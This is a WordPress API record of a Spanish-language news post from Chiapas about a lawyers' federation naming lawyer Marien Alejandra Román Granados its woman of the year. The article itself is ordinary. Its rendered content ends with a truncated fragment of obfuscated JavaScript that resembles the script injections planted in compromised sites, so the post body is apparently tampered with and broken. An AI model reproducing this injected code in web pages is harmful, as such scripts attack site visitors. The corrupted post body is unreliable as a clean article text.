{"id":3610,"date":"2022-07-14T05:35:39","date_gmt":"2022-07-14T05:35:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3610"},"modified":"2022-07-14T05:35:40","modified_gmt":"2022-07-14T05:35:40","slug":"otorgan-reconocimiento-a-conocida-abogada-chiapaneca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3610","title":{"rendered":"Otorgan reconocimiento a conocida abogada chiapaneca"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"3611\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.31-AM-1024x768.jpeg\" alt=\"\" class=\"wp-image-3611\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.31-AM-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.31-AM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.31-AM-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.31-AM-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.31-AM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"3612\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.30-AM-768x1024.jpeg\" alt=\"\" class=\"wp-image-3612\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.30-AM-768x1024.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.30-AM-225x300.jpeg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/WhatsApp-Image-2022-07-13-at-9.29.30-AM.jpeg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 13 de julio de 2022. Tuxtla Guti\u00e9rrez.- La Federaci\u00f3n de Asociaciones Civiles de Abogados en Chiapas, A .C, otorg\u00f3\u00a0 el reconocimiento de la mujer del a\u00f1o a\u00a0 Marien Alejandra Rom\u00e1n Granados\u00a0 en el marco de la celebraci\u00f3n\u00a0 del\u00a0 d\u00eda del abogado.<\/p>\n\n\n\n<p>En este evento, Antonio Flores Flores, presidente de la Federaci\u00f3n de Asociaciones&nbsp; Civiles de Abogados de Chiapas, resalt\u00f3 la participaci\u00f3n de la licenciada&nbsp; Marien Alejandra Rom\u00e1n Granados,&nbsp; en el \u00e1mbito profesional.<\/p>\n\n\n\n<p>Expres\u00f3&nbsp; que: \u201cLa mujer hoy en d\u00eda se enfrenta a grandes retos en el ejercicio de la abogac\u00eda y en el&nbsp; rol social empuja a la mujer m\u00e1s que a competir en el mundo profesional a otro reto a\u00fan m\u00e1s complicado: la conciliaci\u00f3n de su vida familiar con la profesional. Conciliaci\u00f3n \u00e9sta que en no pocas ocasiones se convierte en una gran zancadilla para el progreso y \u00e9xito profesional, adem\u00e1s de que la igualdad de g\u00e9nero debe ser una prioridad en la profesi\u00f3n, por ello es digno reconocer el trabajo de liderazgo de Marien Alejandra&nbsp; Rom\u00e1n\u201d.<\/p>\n\n\n\n<p>Por su parte la homenajeada agradeci\u00f3&nbsp; el reconocimiento otorgado,&nbsp; asegurando que hoy&nbsp; los tiempos han cambiado, que las mujeres son admitidas en el ejercicio profesional, lugar que&nbsp; se han ganado pulso&nbsp; firme.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 13 de julio de 2022. Tuxtla Guti\u00e9rrez.- La Federaci\u00f3n de Asociaciones Civiles de Abogados en Chiapas, A .C, otorg\u00f3\u00a0 el reconocimiento de la mujer del a\u00f1o a\u00a0 Marien Alejandra Rom\u00e1n Granados\u00a0 en el marco de la celebraci\u00f3n\u00a0 del\u00a0 d\u00eda del abogado. En este evento, Antonio Flores Flores, presidente de la Federaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3610","post","type-post","status-publish","format-standard","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3610","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3610"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3610\/revisions"}],"predecessor-version":[{"id":3613,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3610\/revisions\/3613"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3610"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3610"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3610"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}